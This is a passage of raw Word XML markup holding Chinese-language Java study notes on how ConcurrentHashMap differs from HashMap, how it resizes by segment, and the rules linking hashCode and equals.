      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的区别就已经很明显了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>对整个桶数组进行了分段，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>则没有</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>在每一个分段上都用锁进行保护，从而让锁的粒度更精细一些，并发性能更好，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>没有锁机制，不是线程安全的。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　最后用一张图来表来说明一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>吧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRPr="00F41A4C" w:rsidRDefault="000F6072" w:rsidP="000F6072">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="202859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2880995" cy="3140075"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="图片 2" descr="http://www.51testing.com/attachments/2013/09/14982672_2013091714130226duV.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId3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51testing.com/attachments/2013/09/14982672_2013091714130226duV.jpg">
                      <a:hlinkClick r:id="rId37" tgtFrame="&quot;_blank&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880995" cy="3140075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6072" w:rsidRDefault="000F6072" w:rsidP="000E015E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>
        <w:ind w:firstLine="390"/>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最后，在并发的情况下，要么使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>类库中提供的容器，要么就需要自己来管理数据的同步问题了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E015E" w:rsidRPr="00F41A4C" w:rsidRDefault="000E015E" w:rsidP="000E015E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:lastRenderedPageBreak/>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何扩容？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E015E" w:rsidRPr="000E015E" w:rsidRDefault="000E015E" w:rsidP="000E015E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>
        <w:ind w:firstLine="390"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>在插入元素乾会先判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashEntry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>数组是否超过容量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(threshold)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，如果超过阈值，则对数组进行扩容。在扩容的时候，首先会创建一个容量是原来两倍的数</w:t>
      </w:r>
      <w:r w:rsidR="00382773">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>组，然后将原来数组里的元素进行再散列后插入到新的数组里。为了高效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>不会对真个容器进行扩容，而只会对某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>进行扩容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5  HashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C5FCE" w:rsidRPr="00A7236F" w:rsidRDefault="00FD291D" w:rsidP="007C5FCE">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.5</w:t>
      </w:r>
      <w:r w:rsidR="007C5FCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1 HashCode</w:t>
      </w:r>
      <w:r w:rsidR="007C5FCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="007C5FCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidR="007C5FCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D2519" w:rsidRPr="002D2519" w:rsidRDefault="007C175D" w:rsidP="002D2519">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000367C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的存在主要是用于查找的快捷性，如</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是用来在散列存储结构中确定对象的存储地址的；</w:t>
      </w:r>
      <w:r w:rsidR="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ashCode</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法的主要作用是为了配合基于散列的集合一起正常运行，这样的散列集合包括</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HashTable</w:t>
      </w:r>
      <w:r w:rsidR="007E544A" w:rsidRPr="007E544A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D2519" w:rsidRPr="002D2519" w:rsidRDefault="007C175D" w:rsidP="002D2519">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000367C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果两个对象相同，就是适用于</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">equals(Java.lang.Object) </w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，那么这两个对象的</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一定要相同；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D2519" w:rsidRPr="002D2519" w:rsidRDefault="007C175D" w:rsidP="002D2519">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000367C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果对象的</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
